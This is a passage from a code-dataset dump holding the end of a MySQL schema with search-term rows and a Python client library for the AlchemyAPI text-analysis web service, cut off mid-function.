''),\n('dd180a62-2610-11e3-b974-12313d16658b', 'Ignatz', ''),\n('e07e4234-2610-11e3-b653-12313d16658b', 'diy superannuation', ''),\n('343121ca-278e-11e3-9564-12313d16658b', 'Putin', ''),\n('0773015a-2791-11e3-97b5-12313d16658b', 'Madrassa', ''),\n('0e956c10-2792-11e3-aca2-12313d16658b', 'NCIS LA', ''),\n('597f692e-2797-11e3-8e54-12313d16658b', 'Chalupas', ''),\n('34d2d312-2798-11e3-b096-12313d16658b', 'Chalupas', ''),\n('2355f8a2-2799-11e3-a8e1-12313d16658b', 'Chalupas', ''),\n('866d81bc-2799-11e3-927b-12313d16658b', 'Chalupas', ''),\n('818a2cda-279a-11e3-a9f2-12313d16658b', 'Chalupas', ''),\n('4e4cec68-27ae-11e3-b0fc-12313d16658b', 'nano delivery systems for neutraceuticles', ''),\n('eeb708ae-27fa-11e3-9018-12313d16658b', 'DbfxOzuuuFVpo', ''),\n('0d60f030-28a0-11e3-a325-12313d16658b', 'neutraceuticals', ''),\n('a5d05428-29d1-11e3-be8a-12313d16658b', 'methane clathrate', ''),\n('da736336-29eb-11e3-8eb4-12313d16658b', 'neutraceuticals', ''),\n('4c437428-29ed-11e3-84ec-12313d16658b', 'neutraceuticals', ''),\n('41c6cfa2-29ef-11e3-8fa7-12313d16658b', 'chalupas', ''),\n('aac7b200-29ef-11e3-b5d9-12313d16658b', 'neutraceuticals', ''),\n('6b99380a-29f0-11e3-8d19-12313d16658b', 'neutraceuticals', ''),\n('cec5d990-29f2-11e3-a1df-12313d16658b', 'neutraceuticals', ''),\n('12e27f66-29f3-11e3-8a48-12313d16658b', 'neutraceuticals', ''),\n('3bd362e6-29f3-11e3-ae2e-12313d16658b', 'neutraceuticals', ''),\n('dc12aa46-29f3-11e3-aa09-12313d16658b', 'neutraceuticals', ''),\n('07bb02be-29f5-11e3-80c1-12313d16658b', 'neutraceuticals', ''),\n('b34e6b84-29f5-11e3-bd52-12313d16658b', 'root canal', ''),\n('18567fd0-29f6-11e3-9929-12313d16658b', 'root canal', ''),\n('688804c4-29fb-11e3-9cb2-12313d16658b', 'Maruquesas', ''),\n('705b31bc-29fb-11e3-a106-12313d16658b', 'Ruratoa', ''),\n('75f9c0ac-29fb-11e3-9137-12313d16658b', 'New Caledonia', ''),\n('33269646-29fc-11e3-bc06-12313d16658b', 'rorqual', ''),\n('af4dc49c-29fc-11e3-bcc5-12313d16658b', 'narwhal', ''),\n('300dff60-29fe-11e3-8355-12313d16658b', 'narwhal', ''),\n('e3efb866-29fe-11e3-876a-12313d16658b', 'Narwhal', ''),\n('4c1fdb54-2a00-11e3-8c6e-12313d16658b', 'Narwhal', ''),\n('510983da-2a01-11e3-9f81-12313d16658b', 'narwhal', ''),\n('c1cdf268-2a01-11e3-a0bd-12313d16658b', 'narwhal', ''),\n('372c7002-2a02-11e3-b3fd-12313d16658b', 'narwhal', ''),\n('bd81a026-2a13-11e3-8b18-12313d16658b', 'root canal', ''),\n('2da93806-2a72-11e3-a2c9-12313d16658b', 'Leadership New Zealand', ''),\n('151c5174-2ab3-11e3-81e0-12313d16658b', 'no', ''),\n('026cd5c0-2ab4-11e3-b089-12313d16658b', 'Vulpes', ''),\n('3ba636e2-2ab4-11e3-92a1-12313d16658b', 'Chalupas', ''),\n('1750a83e-2abb-11e3-8da7-12313d16658b', 'Chalupas', 
''),\n('69ac8670-2abb-11e3-be4d-12313d16658b', 'Chalupas', ''),\n('385fea84-2d46-11e3-976b-12313d16658b', 'cheap special occasion dress', ''),\n('d93bb9a4-2d7f-11e3-b108-12313d16658b', 'rNImjneBvdE', ''),\n('bdee9f36-2f69-11e3-92ef-12313d16658b', 'san diego chargers jersey', ''),\n('bb64edcc-3001-11e3-8dbc-12313d16658b', 'canada goose camrose parka sale', ''),\n('36a59cd0-3673-11e3-9414-12313d16658b', 'English Language', ''),\n('3db3808c-3673-11e3-91e7-12313d16658b', 'Prisoners of War', ''),\n('c5cfa3a0-3b83-11e3-9931-12313d16658b', 'Chalupas', ''),\n('36c75cc4-3b84-11e3-b800-12313d16658b', 'Chalupas', ''),\n('2ef6f676-3c47-11e3-8e23-12313d16658b', 'Chalupas', '');\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `skus`\n--\n\nCREATE TABLE IF NOT EXISTS `skus` (\n `sku` bigint(20) NOT NULL AUTO_INCREMENT,\n PRIMARY KEY (`sku`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `standalone_print_cover_builds`\n--\n\nCREATE TABLE IF NOT EXISTS `standalone_print_cover_builds` (\n `ISBN` mediumtext NOT NULL,\n `covertitle` mediumtext NOT NULL,\n `shorttitle` mediumtext NOT NULL,\n `editedby` mediumtext NOT NULL,\n `spinepixels` int(11) NOT NULL,\n `covercolor` mediumtext NOT NULL,\n `coverfontcolor` mediumtext NOT NULL,\n `coverfont` mediumtext NOT NULL,\n `submitted_to_LSI` tinyint(1) NOT NULL DEFAULT '0',\n `uuid` mediumtext NOT NULL\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='to track cover build jobs';\n\n-- --------------------------------------------------------\n\n--\n-- Table structure for table `user_credits`\n--\n\nCREATE TABLE IF NOT EXISTS `user_credits` (\n `user_id` int(11) NOT NULL AUTO_INCREMENT,\n `user_points_initial` int(11) NOT NULL,\n `user_points_now` int(11) NOT NULL,\n PRIMARY KEY (`user_id`)\n) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ;\n\n/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n" }, { "alpha_fraction": 0.6784966588020325, "alphanum_fraction": 0.6803678870201111, "avg_line_length": 35.78996658325195, "blob_id": "69de0a5fcd7e893e5c8bb1159587afe50436028f", "content_id": "e9a742de5e4c5ecb4af817e2d1400128d9c21a05", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31530, "license_type": "permissive", "max_line_length": 98, "num_lines": 857, "path": "/scripts/includes/AlchemyAPI.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\nimport urllib.request, urllib.parse, urllib.error\nimport sys\n\nfrom xml.etree import ElementTree as etree\n\nclass AlchemyAPI_Params(object):\n _url = \"\"\n _html = \"\"\n _text = \"\"\n _outputMode = \"\"\n _customParameters = \"\"\n def getUrl(self):\n return self._url\n def setUrl(self, url):\n self._url = url\n def getHtml(self):\n return self._html\n def setHtml(self, html):\n self._html = html\n def getText(self):\n return self._text\n def setText(self, text):\n self._text = text\n def getOutputMode(self):\n return self._mode\n def setOutputMode(self, mode):\n if mode != \"xml\":\n raise Exception('Error setting output mode.')\n self._outputMode = mode\n def getCustomParameters(self):\n return self._customParameters\n def setCustomParameters(self, *values):\n self._customParameters = \"\"\n for i in 
len(values):\n self._customParameters += \"&\" + values[i] + \"=\" + urllib.parse.quote(values[i + 1])\n i = i + 1\n def getParameterString(self):\n retString = \"\"\n if self._url != \"\":\n retString += \"&url=\" + urllib.parse.quote(self._url)\n if self._html != \"\":\n retString += \"&html=\" + urllib.parse.quote(self._html)\n if self._text != \"\":\n retString += \"&text=\" + urllib.parse.quote(self._text)\n if self._outputMode != \"\":\n retString += \"&outputMode=\" + urllib.parse.quote(self._outputMode)\n if self._customParameters != \"\":\n retString += self._customParameters\n return retString\n\n\nclass AlchemyAPI_NamedEntityParams(AlchemyAPI_Params):\n _disambiguate = \"\"\n _linkedData = \"\"\n _coreference = \"\"\n _quotations = \"\"\n _sourceText = \"\"\n _showSourceText = \"\"\n _maxRetrieve = \"\"\n _baseUrl = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n _sentiment = \"\"\n def getDisambiguate(self):\n return self._disambiguate\n def setDisambiguate(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Disambiguate.')\n self._disambiguate = setting\n def getLinkedData(self):\n return self._linkedData\n def setLinkedData(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting LinkedData.')\n self._linkedData = setting\n def getCoreference(self):\n return self._coreference\n def setCoreference(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Coreference.')\n self._coreference = setting\n def getQuotations(self):\n return self._quotations\n def setQuotations(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Quotations.')\n self._quotations = setting\n def getShowSourceText(self):\n return self._showSourceText\n def setShowSourceText(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting ShowSourceText.')\n self._showSourceText = setting\n def getSourceText(self):\n return self._quotations\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cleaned':\n if setting != 'raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getMaxRetrieve(self):\n return self._maxRetrieve\n def setMaxRetrieve(self, setting):\n self._maxRetrieve = setting\n def getBaseUrl(self):\n return self._baseUrl\n def setBaseUrl(self, setting):\n self._baseUrl = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getSentiment(self):\n return self._sentiment\n def setSentiment(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Sentiment.')\n self._sentiment = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_NamedEntityParams, self).getParameterString()\n if self._disambiguate != \"\":\n retString += \"&disambiguate=\" + str(self._disambiguate)\n if self._linkedData != \"\":\n retString += \"&linkedData=\" + str(self._linkedData)\n if self._coreference != \"\":\n retString += \"&coreference=\" + str(self._coreference)\n if self._quotations != \"\":\n retString += \"&quotations=\" + str(self._quotations)\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._showSourceText != \"\":\n retString += \"&showSourceText=\" + 
str(self._showSourceText)\n if self._maxRetrieve != \"\":\n retString += \"&maxRetrieve=\" + str(self._maxRetrieve)\n if self._baseUrl != \"\":\n retString += \"&baseUrl=\" + urllib.parse.quote(self._baseUrl)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n if self._sentiment != \"\":\n retString += \"&sentiment=\" + str(self._sentiment)\n return retString\n\n\nclass AlchemyAPI_CategoryParams(AlchemyAPI_Params):\n _sourceText = \"\"\n _baseUrl = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n def getSourceText(self):\n return self._quotations\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getBaseUrl(self):\n return self._baseUrl\n def setBaseUrl(self, setting):\n self._baseUrl = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_CategoryParams, self).getParameterString()\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._baseUrl != \"\":\n retString += \"&baseUrl=\" + urllib.parse.quote(self._baseUrl)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n return retString\n\n\nclass AlchemyAPI_LanguageParams(AlchemyAPI_Params):\n _sourceText = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n def getSourceText(self):\n return self._sourceText\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cleaned':\n if setting != 'raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_LanguageParams, self).getParameterString()\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n return retString\n\n\nclass AlchemyAPI_ConceptParams(AlchemyAPI_Params):\n _sourceText = \"\"\n _showSourceText = \"\"\n _maxRetrieve = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n _linkedData = \"\"\n def getSourceText(self):\n return self._sourceText\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getShowSourceText(self):\n return self._showSourceText\n def setShowSourceText(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting ShowSourceText.')\n self._showSourceText = setting\n def getMaxRetrieve(self):\n return self._maxRetrieve\n def setMaxRetrieve(self, setting):\n self._maxRetrieve = setting\n def getLinkedData(self):\n return self._linkedData\n def 
setLinkedData(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting LinkedData.')\n self._linkedData = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_ConceptParams, self).getParameterString()\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._showSourceText != \"\":\n retString += \"&showSourceText=\" + str(self._showSourceText)\n if self._maxRetrieve != \"\":\n retString += \"&maxRetrieve=\" + str(self._maxRetrieve)\n if self._linkedData != \"\":\n retString += \"&linkedData=\" + str(self._linkedData)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n return retString\n\n\nclass AlchemyAPI_KeywordParams(AlchemyAPI_Params):\n _sourceText = \"\"\n _showSourceText = \"\"\n _sentiment = \"\"\n _maxRetrieve = \"\"\n _baseUrl = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n _keywordExtractMode = \"\"\n def getSourceText(self):\n return self._sourceText\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getShowSourceText(self):\n return self._showSourceText\n def setShowSourceText(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting ShowSourceText.')\n self._showSourceText = setting\n def getSentiment(self):\n return self._sentiment\n def setSentiment(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Sentiment.')\n self._sentiment = setting\n def getMaxRetrieve(self):\n return self._maxRetrieve\n def setMaxRetrieve(self, setting):\n self._maxRetrieve = setting\n def getBaseUrl(self):\n return self._baseUrl\n def setBaseUrl(self, setting):\n self._baseUrl = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getKeywordExtractMode(self):\n return self._keywordExtractMode\n def setKeywordExtractMode(self, setting):\n if setting != 'strict':\n if setting != 'normal':\n if setting != '':\n raise Exception('Error setting KeywordExtractMode.')\n self._keywordExtractMode = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_KeywordParams, self).getParameterString()\n if self._sourceText != \"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._showSourceText != \"\":\n retString += \"&showSourceText=\" + str(self._showSourceText)\n if self._maxRetrieve != \"\":\n retString += \"&maxRetrieve=\" + str(self._maxRetrieve)\n if self._baseUrl != \"\":\n retString += \"&baseUrl=\" + urllib.parse.quote(self._baseUrl)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n if self._keywordExtractMode != \"\":\n retString += \"&keywordExtractMode=\" + urllib.parse.quote(self._keywordExtractMode)\n if self._sentiment != \"\":\n retString += \"&sentiment=\" + str(self._sentiment)\n return 
retString\n\t\n\t\nclass AlchemyAPI_RelationParams(AlchemyAPI_Params):\n _disambiguate = \"\"\n _linkedData = \"\"\n _coreference = \"\"\n _entities = \"\"\n _sentimentExcludeEntities = \"\"\n _requireEntities = \"\"\n _sourceText = \"\"\n _showSourceText = \"\"\n _maxRetrieve = \"\"\n _baseUrl = \"\"\n _cQuery = \"\"\n _xPath = \"\"\n _sentiment = \"\"\n def getDisambiguate(self):\n return self._disambiguate\n def setDisambiguate(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Disambiguate.')\n self._disambiguate = setting\n def getLinkedData(self):\n return self._linkedData\n def setLinkedData(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting LinkedData.')\n self._linkedData = setting\n def getCoreference(self):\n return self._coreference\n def setCoreference(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Coreference.')\n self._coreference = setting\n def getEntities(self):\n return self._entities\n def setEntities(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Entities.')\n self._entities = setting\n def getSentimentExcludeEntities(self):\n return self._sentimentExcludeEntities\n def setSentimentExcludeEntities(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting SentimentExcludeEntities.')\n self._sentimentExcludeEntities = setting\n def getRequireEntities(self):\n return self._requireEntities\n def setRequireEntities(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting RequireEntities.')\n self._requireEntities = setting\n def getShowSourceText(self):\n return self._showSourceText\n def setShowSourceText(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting ShowSourceText.')\n self._showSourceText = setting\n def getSourceText(self):\n return self._quotations\n def setSourceText(self, setting):\n if setting != 'cleaned_or_raw':\n if setting != 'cleaned':\n if setting != 'raw':\n if setting != 'cquery':\n if setting != 'xpath':\n raise Exception('Error setting SourceText.')\n self._sourceText = setting\n def getMaxRetrieve(self):\n return self._maxRetrieve\n def setMaxRetrieve(self, setting):\n self._maxRetrieve = setting\n def getBaseUrl(self):\n return self._baseUrl\n def setBaseUrl(self, setting):\n self._baseUrl = setting\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getXPath(self):\n return self._xPath\n def setXPath(self, setting):\n self._xPath = setting\n def getSentiment(self):\n return self._sentiment\n def setSentiment(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting Sentiment.')\n self._sentiment = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_RelationParams, self).getParameterString()\n if self._disambiguate != \"\":\n retString += \"&disambiguate=\" + str(self._disambiguate)\n if self._linkedData != \"\":\n retString += \"&linkedData=\" + str(self._linkedData)\n if self._coreference != \"\":\n retString += \"&coreference=\" + str(self._coreference)\n if self._entities != \"\":\n retString += \"&entities=\" + str(self._entities)\n if self._sentimentExcludeEntities != \"\":\n retString += \"&sentimentExcludeEntities=\" + str(self._sentimentExcludeEntities)\n if self._requireEntities != \"\":\n retString += \"&requireEntities=\" + str(self._requireEntities)\n if self._sourceText != 
\"\":\n retString += \"&sourceText=\" + urllib.parse.quote(self._sourceText)\n if self._showSourceText != \"\":\n retString += \"&showSourceText=\" + str(self._showSourceText)\n if self._maxRetrieve != \"\":\n retString += \"&maxRetrieve=\" + str(self._maxRetrieve)\n if self._baseUrl != \"\":\n retString += \"&baseUrl=\" + urllib.parse.quote(self._baseUrl)\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n if self._xPath != \"\":\n retString += \"&xpath=\" + urllib.parse.quote(self._xPath)\n if self._sentiment != \"\":\n retString += \"&sentiment=\" + str(self._sentiment)\n return retString\n\nclass AlchemyAPI_TextParams(AlchemyAPI_Params):\n _useMetaData = \"\"\n _extractLinks = \"\"\n def getUseMetaData(self):\n return self._useMetaData\n def setUseMetaData(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting UseMetaData.')\n self._useMetaData = setting\n def getExtractLinks(self):\n return self._extractLinks\n def setExtractLinks(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting ExtractLinks.')\n self._extractLinks = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_TextParams, self).getParameterString()\n if self._useMetaData != \"\":\n retString += \"&useMetaData=\" + str(self._useMetaData)\n if self._extractLinks != \"\":\n retString += \"&extractLinks=\" + str(self._extractLinks)\n return retString\n\n\nclass AlchemyAPI_ConstraintQueryParams(AlchemyAPI_Params):\n _cQuery = \"\"\n def getConstraintQuery(self):\n return self._cQuery\n def setConstraintQuery(self, setting):\n self._cQuery = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_ConstraintQueryParams, self).getParameterString()\n if self._cQuery != \"\":\n retString += \"&cquery=\" + urllib.parse.quote(self._cQuery)\n return retString\n\nclass AlchemyAPI_TargetedSentimentParams(AlchemyAPI_Params):\n _showSourceText = \"\"\n _target = \"\"\n def getShowSourceText(self):\n return self._showSourceText\n def setShowSourceText(self, setting):\n if setting != 1:\n if setting != 0:\n raise Exception('Error setting showSourceText.')\n self._showSourceText = setting\n def getTarget(self):\n return self._target\n def setTarget(self, setting):\n self._target = setting\n def getParameterString(self):\n retString = super(AlchemyAPI_TargetedSentimentParams, self).getParameterString()\n if self._showSourceText != \"\":\n retString += \"&showSourceText=\" + str(self._showSourceText)\n if self._target != \"\":\n retString += \"&target=\" + str(self._target)\n return retString\n\nclass AlchemyAPI:\n _apiKey = \"\"\n _hostPrefix = \"access\"\n def setAPIHost(self, apiHost):\n self._hostPrefix = apiHost;\n if len(self._hostPrefix) < 2:\n raise Exception('Error setting API host.')\n def setAPIKey(self, apiKey):\n self._apiKey = apiKey;\n if len(self._apiKey) < 5:\n raise Exception('Error setting API key.')\n def loadAPIKey(self, filename):\n file = open(filename, 'r')\n line = file.readline()\n self._apiKey = line.strip();\n if len(self._apiKey) < 5:\n raise Exception('Error loading API key.')\n def URLGetRankedNamedEntities(self, url, namedEntityParams=None):\n self.CheckURL(url)\n if namedEntityParams == None:\n namedEntityParams = AlchemyAPI_NamedEntityParams()\n namedEntityParams.setUrl(url)\n return self.GetRequest(\"URLGetRankedNamedEntities\", \"url\", namedEntityParams)\n def HTMLGetRankedNamedEntities(self, html, url, namedEntityParams=None):\n self.CheckHTML(html, url)\n if 
namedEntityParams == None:\n namedEntityParams = AlchemyAPI_NamedEntityParams()\n namedEntityParams.setUrl(url)\n namedEntityParams.setHtml(html)\n return self.PostRequest(\"HTMLGetRankedNamedEntities\", \"html\", namedEntityParams)\n def TextGetRankedNamedEntities(self, text, namedEntityParams=None):\n self.CheckText(text)\n if namedEntityParams == None:\n namedEntityParams = AlchemyAPI_NamedEntityParams()\n namedEntityParams.setText(text)\n return self.PostRequest(\"TextGetRankedNamedEntities\", \"text\", namedEntityParams)\n def URLGetRankedConcepts(self, url, conceptParams=None):\n self.CheckURL(url)\n if conceptParams == None:\n conceptParams = AlchemyAPI_ConceptParams()\n conceptParams.setUrl(url)\n return self.GetRequest(\"URLGetRankedConcepts\", \"url\", conceptParams)\n def HTMLGetRankedConcepts(self, html, url, conceptParams=None):\n self.CheckHTML(html, url)\n if conceptParams == None:\n conceptParams = AlchemyAPI_ConceptParams()\n conceptParams.setUrl(url)\n conceptParams.setHtml(html)\n return self.PostRequest(\"HTMLGetRankedConcepts\", \"html\", conceptParams)\n def TextGetRankedConcepts(self, text, conceptParams=None):\n self.CheckText(text)\n if conceptParams == None:\n conceptParams = AlchemyAPI_ConceptParams()\n conceptParams.setText(text)\n return self.PostRequest(\"TextGetRankedConcepts\", \"text\", conceptParams)\n def URLGetRankedKeywords(self, url, keywordParams=None):\n self.CheckURL(url)\n if keywordParams == None:\n keywordParams = AlchemyAPI_KeywordParams()\n keywordParams.setUrl(url)\n return self.GetRequest(\"URLGetRankedKeywords\", \"url\", keywordParams)\n def HTMLGetRankedKeywords(self, html, url, keywordParams=None):\n self.CheckHTML(html, url)\n if keywordParams == None:\n keywordParams = AlchemyAPI_KeywordParams()\n keywordParams.setUrl(url)\n keywordParams.setHtml(html)\n return self.PostRequest(\"HTMLGetRankedKeywords\", \"html\", keywordParams)\n def TextGetRankedKeywords(self, text, keywordParams=None):\n self.CheckText(text)\n if keywordParams == None:\n keywordParams = AlchemyAPI_KeywordParams()\n keywordParams.setText(text)\n return self.PostRequest(\"TextGetRankedKeywords\", \"text\", keywordParams)\n def URLGetLanguage(self, url, languageParams=None):\n self.CheckURL(url)\n if languageParams == None:\n languageParams = AlchemyAPI_LanguageParams()\n languageParams.setUrl(url)\n return self.GetRequest(\"URLGetLanguage\", \"url\", languageParams)\n def HTMLGetLanguage(self, html, url, languageParams=None):\n self.CheckHTML(html, url)\n if languageParams == None:\n languageParams = AlchemyAPI_LanguageParams()\n languageParams.setUrl(url)\n languageParams.setHtml(html)\n return self.PostRequest(\"HTMLGetLanguage\", \"html\", languageParams)\n def TextGetLanguage(self, text, languageParams=None):\n self.CheckText(text)\n if languageParams == None:\n languageParams = AlchemyAPI_LanguageParams()\n languageParams.setText(text)\n return self.PostRequest(\"TextGetLanguage\", \"text\", languageParams)\n def URLGetCategory(self, url, categParams=None):\n self.CheckURL(url)\n if categParams == None:\n categParams = AlchemyAPI_CategoryParams()\n categParams.setUrl(url)\n return self.GetRequest(\"URLGetCategory\", \"url\", categParams)\n def HTMLGetCategory(self, html, url, categParams=None):\n self.CheckHTML(html, url)\n if categParams == None:\n categParams = AlchemyAPI_CategoryParams()\n categParams.setUrl(url)\n categParams.setHtml(html)\n return self.PostRequest(\"HTMLGetCategory\", \"html\", categParams)\n def TextGetCategory(self, text, 
categParams=None):\n self.CheckText(text)\n if categParams == None:\n categParams = AlchemyAPI_CategoryParams()\n categParams.setText(text)\n return self.PostRequest(\"TextGetCategory\", \"text\", categParams)\n def URLGetText(self, url, textParams=None):\n self.CheckURL(url)\n if textParams == None:\n textParams = AlchemyAPI_TextParams()\n textParams.setUrl(url)\n return self.GetRequest(\"URLGetText\", \"url\", textParams)\n def HTMLGetText(self, html, url, textParams=None):\n self.CheckHTML(html, url)\n if textParams == None:\n textParams = AlchemyAPI_TextParams()\n textParams.setUrl(url)\n textParams.setHtml(html)\n return self.PostRequest(\"HTMLGetText\", \"html\", textParams)\n def URLGetRawText(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetRawText\", \"url\", baseParams)\n def HTMLGetRawText(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetRawText\", \"html\", baseParams)\n def URLGetTitle(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetTitle\", \"url\", baseParams)\n def HTMLGetTitle(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetTitle\", \"html\", baseParams)\n def URLGetFeedLinks(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetFeedLinks\", \"url\", baseParams)\n def HTMLGetFeedLinks(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetFeedLinks\", \"html\", baseParams)\n def URLGetMicroformats(self, url, baseParams=None):\n self.CheckURL(url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n return self.GetRequest(\"URLGetMicroformatData\", \"url\", baseParams)\n def HTMLGetMicroformats(self, html, url, baseParams=None):\n self.CheckHTML(html, url)\n if baseParams == None:\n baseParams = AlchemyAPI_Params()\n baseParams.setUrl(url)\n baseParams.setHtml(html)\n return self.PostRequest(\"HTMLGetMicroformatData\", \"html\", baseParams)\n def URLGetConstraintQuery(self, url, query, cQueryParams=None):\n self.CheckURL(url)\n if len(query) < 2:\n raise Exception('Invalid constraint query specified.')\n if cQueryParams == None:\n cQueryParams = AlchemyAPI_ConstraintQueryParams()\n cQueryParams.setUrl(url)\n cQueryParams.setConstraintQuery(query)\n return self.GetRequest(\"URLGetConstraintQuery\", \"url\", cQueryParams)\n def HTMLGetConstraintQuery(self, html, url, query, cQueryParams=None):\n self.CheckHTML(html, url)\n if len(query) < 2:\n raise Exception('Invalid constraint query specified.')\n if cQueryParams == None:\n cQueryParams = AlchemyAPI_ConstraintQueryParams()\n cQueryParams.setUrl(url)\n cQueryParams.setHtml(html)\n cQueryParams.setConstraintQuery(query)\n return self.PostRequest(\"HTMLGetConstraintQuery\", \"html\", cQueryParams)\n def 